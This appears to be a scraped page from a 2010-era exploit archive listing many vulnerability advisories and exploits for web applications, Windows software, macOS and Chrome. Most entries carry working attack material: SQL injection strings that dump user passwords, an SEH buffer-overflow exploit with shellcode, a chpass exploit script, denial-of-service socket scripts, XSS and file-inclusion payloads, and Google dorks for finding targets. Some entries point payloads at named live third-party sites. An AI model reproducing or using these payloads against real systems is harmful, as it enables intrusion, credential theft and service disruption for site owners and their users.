runt-communications Design SQL Injection Vulnerability

Text : 

=========================================================
runt-communications Design SQL Injection Vulnerability
=========================================================
##########################################
# Name: runt-communications Design SQL Injection Vulnerability
# Date: 2010-05-23
# vendor: http://runtcommunications.com
# Author: Ashiyane Digital Security Team
# Discovered By: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork: intext:Design by: runt communications

[+] Vulnerability: http://[site]/[path]/page.php?id=[SQLi]

[+] Live Demo:
http://www.naturetrust.bc.ca/spotlight.php?id=-999+union+all+select+version
(),2,3,4,5--


##########################################


  References : 

http://www.Ashiyane.org/forums/

READMORE

Cactis 0.8.7e and below multiple cross site scripting

Text : 

Cacti Multiple Parameter Cross Site Scripting Vulnerabilities


I. BACKGROUND
---------------------

"Cacti is a complete network graphing solution designed to harness the
power
of RRDTool's data storage and graphing functionality. Cacti provides a
fast
poller, advanced graph templating, multiple data acquisition methods, and
user management features out of the box." from cacti.net


II. VULNERABILITIES
---------------------

VUPEN Web Vulnerability Research Team discovered three vulnerabilities in
PHP-Calendar.

These issues are caused by input validation errors when processing the
"hostname", "host_id" and "description"
parameters, which could be exploited
by attackers to cause arbitrary scripting code to be executed by the
user's
browser in the security context of an affected Web site.


III. AFFECTED PRODUCTS
---------------------------

Cacti version 0.8.7e and prior


IV. SOLUTION
----------------

Upgrade to Cacti version 0.8.7f


V. CREDIT
--------------

These vulnerabilities were discovered by Mohammed Boumediane (VUPEN
Security)
with help of the VUPEN Web Application Security Scanning (WASS)
technology.


VI. VUPEN Web Application Security Scanner (WASS)
----------------------------------------------------

VUPEN Web Application Security Scanner (WASS) is a SaaS security scanning
technology which enables corporations and organizations to identify, track
and remediate security vulnerabilities affecting their web sites and
web applications, prevent criminals from gaining unauthorized access to
sensitive data, and comply with security requirements such as PCI.

VUPEN WASS is based on a proprietary technology developed by VUPEN
security
experts, and combines black-box (smart and automated) and grey-box
(signature-based) scanning to accurately identify web vulnerabilities such
as those in the OWASP Top 10 including SQL injection and cross-site
scripting,
but also real-world vulnerabilities such as shell command injection and
file inclusion.

Read More: http://www.vupen.com/english/wass/


VII. REFERENCES
----------------------

http://www.vupen.com/english/advisories/2010/1203
http://www.cacti.net/release_notes_0_8_7f.php


VIII. DISCLOSURE TIMELINE
-----------------------------

2010-05-05 - Vendor notified
2010-05-05 - Vendor response
2010-05-09 - status update received
2010-05-21 - Coordinated public Disclosure

READMORE

SyncBack Freeware 3.2.20.0 local buffer overflow

Text : 

#!/usr/bin/ruby
# Software : SyncBack Freeware V3.2.20.0
# Author : Lincoln
# Date : May 19, 2010
# Reference :
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-041
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may
cause.
#
#
banner =
"|------------------------------------------------------------------|n
" +
"| __ __
|n" +
"| _________ ________ / /___ _____ / /____ ____ _____ ___
|n" +
"| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \
|n" +
"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / /
|n" +
"| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/
|n" +
"|
|n" +
"| http://www.corelan.be:8800
|n" +
"|
|n" +
"|-------------------------------------------------[ EIP Hunters
]--|nn"

print banner
puts "[+] Exploit for SyncBack Freeware V3.2.20.0"

#Zip Headers
header1=
"x50x4Bx03x04x14x00x00x00" +
"x00x00xB7xACxCEx34x00x00" +
"x00x00x00x00x00x00x00x00" +
"x00xb8x0bx00x00x00"

header2=
"x50x4Bx01x02x14x00x14x00" +
"x00x00x00x00xB7xACxCEx34" +
"x00x00x00x00x00x00x00x00" +
"x00x00x00x00xb8x0bx00x00" +
"x00x00x00x00x01x00x24x00" +
"x00x00x00x00x00x00"

header3=
"x50x4Bx05x06x00x00x00x00" +
"x01x00x01x00xe6x0bx00x00" +
"xd6x0bx00x00x00x00"

#sub cx,b38 / call ecx
align =
"x66x81xe9x38x0bxffxd1"

#msgbox: "Exploited by Corelan Security Team"
shellcode =
"x89xe3xdaxd7xd9x73xf4x59x49x49x49x49x49x49" +
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5a" +
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" +
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42" +
"x75x4ax49x4ax79x4ax4bx4dx4bx4bx69x51x64x45" +
"x74x4ax54x45x61x4ex32x4ex52x42x5ax46x51x49" +
"x59x42x44x4ex6bx51x61x44x70x4cx4bx43x46x44" +
"x4cx4ex6bx42x56x47x6cx4cx4bx51x56x44x48x4c" +
"x4bx51x6ex45x70x4ex6bx45x66x50x38x50x4fx47" +
"x68x50x75x4cx33x50x59x45x51x4bx61x4bx4fx48" +
"x61x51x70x4cx4bx50x6cx46x44x45x74x4cx4bx51" +
"x55x47x4cx4cx4bx50x54x43x35x50x78x43x31x4b" +
"x5ax4cx4bx42x6ax47x68x4ex6bx43x6ax47x50x45" +
"x51x4ax4bx48x63x46x57x50x49x4ex6bx44x74x4c" +
"x4bx45x51x4ax4ex44x71x49x6fx50x31x4bx70x4b" +
"x4cx4ex4cx4fx74x4bx70x43x44x46x6ax4ax61x4a" +
"x6fx44x4dx47x71x4bx77x48x69x4ax51x4bx4fx49" +
"x6fx49x6fx45x6bx43x4cx45x74x51x38x51x65x49" +
"x4ex4ex6bx42x7ax45x74x45x51x4ax4bx43x56x4e" +
"x6bx46x6cx42x6bx4cx4bx43x6ax45x4cx43x31x4a" +
"x4bx4ex6bx45x54x4ex6bx47x71x4dx38x4fx79x51" +
"x54x46x44x47x6cx45x31x4ax63x4fx42x44x48x46" +
"x49x48x54x4fx79x4bx55x4dx59x49x52x50x68x4c" +
"x4ex50x4ex44x4ex48x6cx50x52x4bx58x4dx4cx4b" +
"x4fx49x6fx4bx4fx4fx79x51x55x46x64x4dx6bx51" +
"x6ex49x48x4dx32x51x63x4cx47x45x4cx44x64x51" +
"x42x4dx38x4ex6bx49x6fx49x6fx4bx4fx4cx49x42" +
"x65x47x78x43x58x42x4cx50x6cx45x70x4bx4fx51" +
"x78x47x43x45x62x46x4ex45x34x45x38x51x65x51" +
"x63x45x35x44x32x4dx58x51x4cx44x64x44x4ax4c" +
"x49x48x66x43x66x4bx4fx43x65x46x64x4cx49x4b" +
"x72x50x50x4dx6bx4ex48x4cx62x50x4dx4dx6cx4e" +
"x67x47x6cx47x54x46x32x4bx58x43x6ex49x6fx49" +
"x6fx49x6fx42x48x51x74x45x71x51x48x45x70x43" +
"x58x44x30x43x47x42x4ex42x45x44x71x4bx6bx4b" +
"x38x43x6cx45x74x46x66x4bx39x48x63x45x38x50" +
"x61x42x4dx50x58x45x70x51x78x42x59x45x70x50" +
"x54x51x75x51x78x44x35x43x42x50x69x51x64x43" +
"x58x51x30x43x63x45x35x43x53x51x78x42x45x42" +
"x4cx50x61x50x6ex42x48x51x30x51x53x50x6fx50" +
"x72x45x38x43x54x51x30x50x62x43x49x51x78x42" +
"x4fx43x59x42x54x50x65x51x78x42x65x51x68x42" +
"x50x50x6cx46x51x48x49x4ex68x50x4cx46x44x45" +
"x72x4dx59x49x71x44x71x4ax72x43x62x43x63x50" +
"x51x46x32x4bx4fx48x50x50x31x4fx30x46x30x4b" +
"x4fx51x45x44x48x45x5ax41x41"

size = 2996
junk = "x90" * (276 - align.length)

nseh = "x5cx61x98xa0" #pop esp / pop ad / jmp ecx
seh = "x4ax6bx40x00" #universal p/p retn 8

payload = junk + align + nseh + seh + shellcode
rest = "D" * (size - payload.length)
final = payload + rest + ".txt"

filename = "Sync.sps"
f = File.new(filename, 'w')
f.write header1 + final + header2 + final + header3
f.close

puts "[+] file size : #{final.length}"
puts "[+] Wrote exploit file : #{filename}"
puts "[+] Import SyncBack profile and boom!nn"

READMORE

CommuniCrypt Mail 1.16 (ANSMTP.dll/AOSMTP.dll) Active-X buffer overflow

Text : 


| __ __
|
| _________ ________ / /___ _____ / /____ ____ _____ ___
|
| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / /
|
| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/ |
|
|
| http://www.corelan.be:8800
|
| security@corelan.be
|
|
|
|-------------------------------------------------[ EIP Hunters
]--|

# Software : CommuniCrypt Mail 1.16 (ANSMTP.dll/AOSMTP.dll) ActiveX
# Author : Lincoln
# Date : May 19, 2010
# Reference :
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-042
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may
cause.
#
# Communicrypt is running a vulnerable version of ANSMTP.dll/AOSMTP.dll
# See advisory for more details
#
-->





  References :  http://securityreason.com/wlb_show/WLB-2010050120

READMORE

Google Chrome 4.1.249.1059 cross origin bypass vulnerability in Google URL

Text : 

# Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
#
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663
#
# Author: Jordi Chancel
#
# Software Link:
http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-secu
rity-fixes.html
#
# Description: {
# The Google URL Parsing Library (aka google-url or GURL) in Google Chrome

# before 4.1.249.1064 allows remote attackers to bypass the Same Origin
Policy
# via CHARACTER TABULATION or others escape characters inside javascript:
protocol string. }
#
# Some PoC :

READMORE

Lokomedia CMS 2.0 cross site scripting

Text : 


# [x] Author: Andrea Bocchetti
# [x] Homepage : www.geekit.it


// Software Info
# [x] Vendor : http://bukulokomedia.com/home
CMS : Lokomedia CMS
# [x] Version: [2.0]




[#]------------------------------------------------------------------------
-------------------[#]
#
# [x] Bug :

Exploit:

# just enter the form to exploit
the XSS
#



  References :  http://securityreason.com/wlb_show/WLB-2010050118

READMORE

yupana-0.1rc1 RFI/LFI vulnerability

 Text : 

------------------------------------------------------------------------
yupana-0.1rc1 RFI/LFI vulnerability
------------------------------------------------------------------------

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\
0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit
0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


Url: http://yupana.berlios.de/
autohr: eidelweiss (eidleweiss[at]cyberservices.com
Greets: all hacker`s
Require: You need to be login to run this exploit

====

-=[ vuln code ]=-

[-] index.php

require_once('includes/lib.php');

/*
* Main routing views
*
*/

$q = optional_param('q');

if (empty($q) || $q == '/') {
// default index
do_header();
include($CFG->tpldir . 'main_index.tmpl.php');
}

====

-=[ P0C ]=-

http://127.0.0.1/index.php?q= [LFI]
http://127.0.0.1/index.php?tpldir= [inj3ct0r sh3ll]

=========================| -=[ E0F ]=- |=================================

READMORE

Apple <= 10.6.3 'chpass' BSD insecure temp file creation in /etc vuln

 Text : 

#!/bin/sh
# Apple <= 10.6.3 'chpass' BSD insecure temp file creation in /etc vuln
# =====================================================================
# A user can create a file with rw perms in /etc as owner and populate
# it with arbitrary data. This could be utilized to fill the disk or
# write configuration file information that could be combined with
# another flaw to elevate local privileges. This shell script takes
# an arguement which is the filename to create (appended with .XXXXXX)
# or I.HAX by default.
#
# e.g
#
# fantastics-macbook:~ fantastic$ id
# uid=501(fantastic) gid=20(staff) groups=20(staff)
# fantastics-macbook:~ fantastic$ ls -l /etc
# lrwxr-xr-x@ 1 root wheel 11 10 Feb 18:42 /etc -> private/etc
# fantastics-macbook:~ fantastic$ ./prdelka-vs-APPLE-chpass.sh
# [ Apple <= 10.6.3 'chpass' arbitrary /etc file creation exploit
# Password for fantastic: fuck.apple
# [ Created evil file /etc/I.HAX.9GrrKm
# [ Killing my parent PID 1472
# ./prdelka-vs-APPLE-chpass.sh: line 47: 1472 Killed ./exploit I.HAX
# fantastics-macbook:~ fantastic$ ls -al /etc/I.HAX.9GrrKm
# -rw------- 1 fantastic staff 203 17 May 21:15 /etc/I.HAX.9GrrKm
# fantastics-macbook:~ fantastic$ echo "Turtle power" >
/etc/I.HAX.9GrrKm
# fantastics-macbook:~ fantastic$ cat /etc/I.HAX.9GrrKm
# Turtle power
#
# -- prdelka
cat >> evil.c << EOF
#include
#include
#include

int main(int argc,char* argv[]){
printf("[ Created evil file %sn",argv[1]);
pid_t parent = getppid();
printf("[ Killing my parent PID %dn",parent);
usleep(1000);
kill(parent,9);
exit(0);
}
EOF
gcc evil.c -o evil 2>/dev/null
rm -rf evil.c
cat >> exploit.c << EOF
#include
#include
#include

int main(int argc,char* argv[]){
char* envp[]={"EDITOR=./evil",NULL};
char* args[]={argv[1],NULL};
printf("[ Apple <= 10.6.3 'chpass' arbitrary /etc file creation
exploitn");
execve("/usr/bin/chpass",args,envp);
}
EOF
gcc exploit.c -o exploit 2>/dev/null
rm -rf exploit.c
if [ $1 ]
then
./exploit $1
else
./exploit I.HAX
fi
rm -rf evil exploit



  References :  http://securityreason.com/wlb_show/WLB-2010050116

READMORE

Joomla Component ActiveHelper LiveHelp XSS Vulnerabilities

Text : 


# Exploit Title: Joomla Component ActiveHelper LiveHelp XSS
Vulnerabilities
# Date: 18.05.2010
# Author: Valentin
# Category: webapps/0day
# Version: 2.0.3
# Tested on:
# CVE :
# Code :


[:::::::::::::::::::::::::::::::::::::: 0x1
::::::::::::::::::::::::::::::::::::::]
>> >> General Information
Advisory/Exploit Title = Joomla Component ActiveHelper LiveHelp XSS
Vulnerabilities
Author = Valentin Hoebel
Contact = valentin@xenuser.org


[:::::::::::::::::::::::::::::::::::::: 0x2
::::::::::::::::::::::::::::::::::::::]
>> >> Product information
Name = ActiveHelper LiveHelp
Vendor =ActiveHelper
Vendor Website = http://www.activehelper.com/
Affected Version(s) = 2.0.3


[:::::::::::::::::::::::::::::::::::::: 0x3
::::::::::::::::::::::::::::::::::::::]
>> >> #1 Vulnerability
Type = XSS
Example URIs
->target-site/administrator/components/com_activehelper_livehelp/server/

---->index.php?DOMAINID=XX&URL=XX&TITLE=XX&SERVER=[XSS]
---->cookies.php?&DOMAINID=[XSS]


[:::::::::::::::::::::::::::::::::::::: 0x4
::::::::::::::::::::::::::::::::::::::]
>> >> Additional Information
Vulnerabilities discovered = 18.05.2010
Vendor notified = 18.05.2010
Advisory/Exploit Published = 19.05.2010


[:::::::::::::::::::::::::::::::::::::: 0x5
::::::::::::::::::::::::::::::::::::::]
>> >> Misc
Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
<3 packetstormsecurity.org!


[:::::::::::::::::::::::::::::::::::::: EOF
::::::::::::::::::::::::::::::::::::::]

READMORE

DBCart (article.php) SQL Injection Vulnerability

Text :

-----------------------------------------------------------------------
DBCart (article.php) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : May, 19-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : DBCart ONLINE SHOPPING APPLICATION
Vendor : http://www.debliteck.com/
Google Dork : Use Your Brain & Imagination :)
Overview :

DBCart is an online shopping application that allows perspective customers

to browse your products and either save them on their wish list or add them

to their cart and checkout.
----------------------------------------------------------------

Exploit:
~~~~~~~

9999+and+1=2+union+all+select+version(),2--


SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/article.php?id=[SQLi]
http://127.0.0.1/[path]/article.php?id=9999+and+1=2+union+all+select+versio
n(),2--
----------------------------------------------------------------

Shoutz:
~~~~

- 'malingsial banyak cakap, you skill off bullshit on '
-
LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,ti
an,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,mywisdom,yadoy666,udhit
- c4uR (besok² klo curhat jangan nangis lagi ah uR bruakakaka)
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- elicha cristia [ met ultah yach sayang :) ]
- N.O.C & Technical Support @office "except ahong (fuck you
off)"
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~

v3n0m | YOGYACARDERLINK CREW | v3n0m666[at]live[live]com
Homepage: http://yogyacarderlink.web.id/
http://v3n0m.blogdetik.com/
http://elich4.blogspot.com/ << Update donk >_<

---------------------------[EOF]--------------------------------

READMORE

Fortitude HTTP 1.0.1.6 remote denial of service

 Text : 

#==========================================================================
==================================#
# _ _ __ __ __ _______ _____ __ __
_____ _ _ _____ __ __ #
# /_/ /_ /_ /_ /_ /_______) ) ___ ( /_/__/ ) ___ ( /_/ /_
/_____/_/__/ #
# ) ) )( ( ( /_/( ( ( ( ( ( (___ __// /_/ ) ) ) ) )/ /_/ ) )
)( ( (( (_____/) ) ) ) ) #
# /_/ //\ _ /_\ _ _ / / / / /_/ (_ /_/ /_/ // /_/ (_ /_/ //\ _\
__ /_/ /_/_/ #
# / / // / // / /__ / / /__ ( ( ( )_/ / / _/ )_/ / / / /
// /__/_ #
# )_) / (_(( (_(( (_____(( (_____( /_/ / )_) ) /_/ / )_) /
(_(( (_____)_) ) #
# _/ /_/ /_/ /_____/ /_____/ /_/_/ )_____( _/ )_____( _/
/_/ /_____/_/ _/ #
#
#
#==========================================================================
==================================#
#
#
# Vulnerability............Denial-of-Service
#
# Software.................Fortitude HTTP 1.0.1.6
#
#
Download.................http://www.networkdls.com/Download/HTTPServer32.ex
e #
# Date.....................5/16/10
#
#
#
#==========================================================================
==================================#
#
#
# Site.....................http://cross-site-scripting.blogspot.com/
#
# Email....................john.leitch5@gmail.com
#
#
#
#==========================================================================
==================================#
#
#
# ##Description##
#
#
#
# Fortitude HTTP 1.0.1.6 crashes upon receving an HTTP request containing a
relative resource path with an #
# excessive number of slashes.
#
#
#
#
#
# ##Exploit##
#
#
#
# GET / * 8192 HTTP 1.1
#
# Host: localhost
#
#
#
#
#
#
#
# ##Proof of Concept##
#
import socket
host ='localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

s.send('GET ' + '/' * 8192 + ' HTTP/1.1rn'
'Host: ' + host + 'rnrn')


  References :  http://securityreason.com/wlb_show/WLB-2010050113

READMORE

DataTrack System 3.5 persistent cross site scripting

 Text : 

# Vulnerability............Persistent Cross-Site Scripting
#
# Directory Disclosure
#
# Configuration Disclosure
#
# Source Disclosure
#
# Software.................DataTrack System 3.5
#
# Download.................http://www.magnoware.com/Downloads.aspx
#
# Date.....................5/17/10
#
#
#
#==========================================================================
==================================#
#
#
# Site.....................http://cross-site-scripting.blogspot.com/
#
# Email....................john.leitch5@gmail.com
#
#
#
#==========================================================================
==================================#
#
#
# ##Description##
#
#
#
# User submitted data is not HTML entity encoded before it is rendered.
#
#
#
#
#
# ##Exploit##
#
#
#
# Login using the web client and submit a request with summary set to
. Navigate #
# to My History to see the result.
#
#
#
#==========================================================================
==================================#
#
#
# ##Description##
#
#
#
# The contents of the root directory can be listed by using a specially
crafted URL. #
#
#
#
#
# ##Exploit##
#
#
#
# %u0085
#
# %u00A0
#
#
#
#
#
# ##Proof of Concept##
#
#
#
# http://localhost/%u0085/
#
# http://localhost/%u00A0/
#
#
#
#==========================================================================
==================================#
#
#
# ##Description##
#
#
#
# Forbidden file types (e.g. ascx, config) can be downloaded by appending a
backslash to the filename. #
#
#
#
#
# ##Exploit##
#
#
#
# GET /web.config HTTP/1.1
#
# Host: localhost
#
#
#
#
#
# ##Proof of Concept##
#
#
#
import socket
host ='localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('GET /web.config HTTP/1.1rn'
'Host: ' + host + 'rnrn')

while 1:
response = s.recv(8192)
if not response: break
print response


  References :  http://securityreason.com/wlb_show/WLB-2010050112

READMORE

PHPVidz 0.9.5 remote database disclosure vulnerability

Text : 

Original
Advisory:http://blog.sitewat.ch/2010/05/phpvidz-administrative-password.htm
l

Affecting: phpvidz 0.9.5
Vulnerability: Administrative Password Disclosure
Vendor's Homepage: http://sourceforge.net/projects/phpvidz/
Date: May 15th 2010
Researcher: Michael Brooks


phpvidz does not use a SQL database. Instead it uses a system of flat
files to maintain application state. The administrative password is stored
within the following file and is included during runtime. Because this
file has a .inc extension it is viewable by the attacker.

To exploit this issue visit this url:
http://localhost/phpvidz_0.9.5/includes/init.inc
By default the password is the following constant:
define ('ADMINPASSWORD' , '0000' );
This password can be used to login here (A username is not required):
http://localhost/phpvidz_0.9.5/admin.php


  References :  http://securityreason.com/wlb_show/WLB-2010050111

READMORE

TS Special Editions 7.0 and below multiple disclosure

Text : 


###########################################################################
###################
#
# TS Special Edition <= v.7.0 Multiple Vulnerabilities
# Dork: "Powered by TS Special Edition"
# Site: http://templateshares.net
# Download: http://templateshares.net/special/purchase
# Reported on 02/05/2010
#
# Author: IHTeam
#
###########################################################################
###################
#
# See any seed/leech files of any users
#
# 1) Open any userdatail you want (Ex: /userdetails.php?id=1)
# 2) Paste in url bar this code for:
# 2.1) javascript:TSAjaxRequest('showuploaded'); <---- See Uploaded
Torrent
# 2.2) javascript:TSAjaxRequest('showcompleted'); <---- See Completed
Torrent
# 2.3) javascript:TSAjaxRequest('showleechs'); <---- See In Leech
Torrents
# 2.4) javascript:TSAjaxRequest('showseeds'); <---- See In Seed
Torrents
# 2.5) javascript:TSAjaxRequest('showsnatches'); <---- See Recently
Downloaded
#
###########################################################################
###################
#
# Bypass Vote System
#
# 1) Open any torrent file datail (Ex: /details.php?id=1)
# 2) Edit HTML Source code with FireBug or Opera
# 3) Search 'form id="quickrate"' and edit these information:
# 3.1)
value="CHAGE_YOUR_ID_HERE" name="userid">
# 3.2) javascript:TSQuickRate('torrent_1', 'CHAGE_YOUR_ID_HERE');
# 4) Apply changes and vote the torrent every time you want
#
###########################################################################
###################
#
# MySQL Credential
#
# You can see MySQL Credential by opening /config/DATABASE
#
# Ex: www.mysite.com/config/DATABASE
#
a:4:{s:10:"mysql_host";s:9:"HOSTNAME_OF_MYSQL_DATABASE"
;s:10:"mysql_user";s:11:"USERNAME_OF_MYSQL"
#
;s:10:"mysql_pass";s:10:"PASSWORD_OF_MYSQL";s:8:"m
ysql_db";s:21:"DATABASE_NAME";}
#
# It can be fixed adding .htaccess in /config/ directory
###########################################################################
###################
#
# Others configuration files
#
# 1) /config/WAITSLOT
# 2) /config/TWEAK
# 3) /config/THEME
# 4) /config/STAFFTEAM
# 5) /config/SMTP
# 6) /config/SEO
# 7) /config/SECURITY
# 8) /config/REDIRECT
# 9) /config/PJIRC
# 10) /config/PAYPAL
# 11) /config/MAIN
# 12) /config/KPS
# 13) /config/FORUMCP
# 14) /config/EXTRA
# 15) /config/DATETIME
# 16) /config/CLEANUP
# 17) /pjirc/pjirc.cfg
#
###########################################################################
###################




  References :  http://securityreason.com/wlb_show/WLB-2010050110

READMORE

WebJaxe 1.01 remote SQL injection

Text : 


###########################################################################
####
#
# Exploit Title: WebJaxe Sql Injection
# Date: 14-05-2010
# Author: IHTeam
# Software Link: http://media4.obspm.fr/outils/webjaxe/en/
# Version: 1.01
# Tested on: Win/Linux
#
###########################################################################
####

!You need a registred user!

http://[site]/[path]/php/partie_administrateur/administration.php?page=proj
et_contribution&id_contribution=[SQL]

Example (Show username:password):
http://localhost/webjaxe/php/partie_administrateur/administration.php?page=
projet_contribution&id_contribution=-1/**/UNION/**/ALL/**/SELECT/**/1,c
oncat(prenom,char(58),motdepasse),3,4,5,6/**/FROM/**/utilisateurs

READMORE

Caucho Resin web server 3.1.2 Admin Login XSS Vulnerabilit

Text : 


# Exploit Title:Caucho Resin web server 3.1.2 Admin Login
digest_username&digest_realm XSS Vulnerability
# Date: 2010-05-17
# Author: flyh4t
# Software Link: http://www.caucho.com/
# Version: Professional 3.1.2
# CVE : no



P0C:(no need of login)



POST /resin-admin/ HTTP/1.1
Accept: */*
Referer: http://1.1.1.1/resin-admin/
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; msn OptimizedIE8;ZHCN)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 1.1.1.1
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=abc7CGMIyBwpNgFko8MIs



digest_username=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22&
digest_password1=&digest_password2=&digest_realm=aaa%22%3E%3Cscript
%3Ealert%281%29%3C%2Fscript%3E%3C%22&digest_attempt=true




  References :  http://securityreason.com/wlb_show/WLB-2010050108

READMORE

DB[CMS] 2.01 remote SQL injection

Text : 


# Exploit Title: DB[CMS] Sql Injection Vulnerability
# Author: Pokeng
# Software Link: http://www.debliteck.com/how.php

# Version: Ver2.01
# Platform / Tested on: Win/Linux
# category: webapps/0day
# Code : http://[site]/article.php?id=[SQL]
# Dork : "Designed and Developed by Debliteck Ltd"

//Now I'm Just Alone In The Dark T_T

//Very Thank's For My brother Who Always Give Me Support By The Good
Way = N4ck0 And Aury

Please accept my submission Mr.Admin ^_^





  References :  http://securityreason.com/wlb_show/WLB-2010050107

READMORE

DOURAN Smart Portal remote file uploade

Text : 

# Exploit Title: (DOURAN Smart Portal) remote file uploade

# Author:(black intelligence)

# Software Link: http://smartdouran.com

# Version: [DOURAN Smart Portal V1.7.0.0 ]

# Platform :windows/asp.net

# category: remote

#Exploit:http://target.com

#http://target.com/DesktopModules/fck/editor/filemanager/upload/test.html

#example site: edukaraj3.ir/

#Select the "File Uploader" to use=asp.net

#http://edukaraj3.ir/DesktopModules/fck/editor/filemanager/upload/test.html


#(: filtering110@gmail.com,ahmad_behzadi70@yahoo.com :)

#googel dork = "DOURAN Smart Portal"

READMORE

MyNews v1.0 CMS Sql Injection, local file inclusion and XSS Vulnerabilities

Text : 

MyNews v1.0 CMS - Sql Injection, local file inclusion and XSS
Vulnerabilities
Found by: mr_me - http://net-ninja.net/
Advisory: http://www.corelan.be:8800/advisories.php?id=10-040
Dork: "Corelan Security Team"
Homepage: http://mynews.magtrb.com/
Download:
http://mynews.magtrb.com/download.php?fname=upload/Versions/MyNews+v1.0.zip

Greetz: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
Notes:
- Provided 'as is', without any warranty.
- Use for educational purposes only.
- Do not use this to do anything illegal !
- Corelan cannot be held responsible for any damages this may cause.

******************
Sql Injection PoC:
******************

-------[ SNIP ]----------> article.php, line 10
$sql_query = "select id, title, text, views from
".$prefix."_news where id=".$_GET[id]."";
-------[ EOF SNIP ]------>

http://[server]/MyNews/index.php?act=article&id=[ SQLI ]
http://[server]/MyNews/index.php?act=article&id=-12+union+select+1,2,co
ncat(name,0x3a,pwd),4+from+_authors--

********************
File Inclusion PoCs:
********************

-------[ SNIP ]----------> index.php, line 18
if (!isset($_GET['act'])) { $act = 'news'; } else { $act = $_GET['act']; }

include('./includes/header.php');
require('./includes/'.$act.'.php');
-------[ EOF SNIP ]------>

-------[ SNIP ]----------> admin.php, line 65
if(!isset($act)){$act ="index"; }

if($act){include("includes/admin/$act.php");
$smarty->assign("act", $act);
}
-------[ EOF SNIP ]------>

1:
http://[server]/MyNews/index.php?act=[ LFI ]&id=12
http://[server]/MyNews/index.php?act=../../../../etc/passwd&id=12

2 (requires authentication):
http://[server]/MyNews/admin.php?act=[ LFI ]
http://[server]/MyNews/admin.php?act=../../../../etc/passwd

*******************
Reflective XSS PoC:
*******************

http://[server]/MyNews/admin.php?act=

___________________________________________________________________________
_______________________________________
EOF

READMORE

MigasCMS 1.0 SQL Injection

Text : 

##########################################################
#Title: MigasCMS 1.0 SQL Injection
#Download: http://www.sebrac.webcindario.com/cms/
##########################################################
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Original Advisory:
http://www.itsecteam.com/en/vulnerabilities/vulnerability54.htm
